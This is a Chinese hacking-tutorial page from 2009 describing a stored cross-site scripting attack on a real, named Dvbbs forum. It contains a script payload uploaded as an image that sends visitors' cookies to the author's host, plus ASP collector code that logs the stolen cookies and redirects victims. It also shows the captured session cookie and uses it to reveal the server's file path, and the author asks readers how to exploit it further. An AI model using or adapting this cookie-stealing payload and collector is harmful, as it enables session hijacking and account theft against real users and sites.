当前位置: 首页 > 图文教程 > 网络安全 > 黑客技术 > 关于动网的cookie泻露站点绝路径的问题

黑客技术
软件狗[Dongles]的加密与解密技术(6)
软件狗[Dongles]的加密与解密技术(7)
软件狗[Dongles]的加密与解密技术(8)
计算机硬盘加密的几种方法
加密技术的方方面面
史上MD5解密之最快方法整理
光盘加密大师的加密原理
数据加密原理与实现方法
加密原理_安全文摘
“超级兔子”将文件夹加密的原理是什么?
红黑过招 WinRAR破解“磁盘加密王”
RAR和Word文件的解密与修复
暴力破解的知识原理和经验技巧
防范黑客、病毒、恶意软件4点方法策略
“艾滋女”闫德利照片遭黑客利用
流行的黑客用于攻击网络的常用工具
针对入侵检测系统的漏洞学习黑客的入侵手法
瑞星:酷狗音乐软件(KuGoo.exe)被大量挂马
农场外挂网站日均挂马网页数量1000个以上
少林寺网站11月份遭受3次黑客攻击

黑客技术 中的 关于动网的cookie泻露站点绝路径的问题


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 53 ::
收藏到网摘: n/a

一、跨站测试
先看看我的一次跨站测试吧
我以职业欠钱的站点做测试吧:
Host:zhiyeqianqian.51web.cn
My Test:
先在他的论谈上传两张图,
图一的内容是:
<script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script>
得到url为UploadFile/2005-6/200562716565777847.jpg
图二则是偶的个人照
UploadFile/2005-6/200562716563048909.jpg
写个盗cookie的代码到我的空间,lcx的盗cookie代码有问题,所以修改了一下。
<%
cookiefile=Server.MapPath("cookie.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set cookiefile=fs.OpenTextfile(cookiefile,8,True,0)
cookiefile.Write(Request.QueryString&"<br>")
cookiefile.close
set fs = nothing
%>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://zhiyeqianqian.51web.cn/UploadFile/2005-6/200562716563048909.jpg">
接下来,点击图一,自动转到图二,
二、结果分析
再到我的空间看一下,抓到cookie如下:
msg=ewwwrootzhiyeqianqianwwwroot=UserID=218&usercookies=1&StatUserID=2190418138&password=想要吗?嘿嘿&userhidden=2&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzi;%20ASPSESSIONIDQSCAAQTB=HMPLNIMDHOCDJKPELPGBBOOG;%20Dvbbs;%20DvbbsMagicFace=862;%20upNum=2;%20ASPSESSIONIDQSAAARTB=JBPPMONDDEGFGHEOICDHFJIM<br>
分析cookie我们不难看出他的绝对路径是e:\wwwroot\zhiyeqianqian\wwwroot

三、论谈
本来,最初的测试我是在测试BCT论谈,成功暴出他的绝对路径,一开始的时候,我还认为可能又是动网出洞洞了,所以又去测试了其它几个站,测试结果是其它的站点并没有暴出路径,今天再次测试“欠我钱”的论谈,却又暴不出来,查了一下代码,和别人的代码一个样,根本没什么差别。
偶想听听大家的看法,到底是哪里出了问题,能不能深入利用~~~
'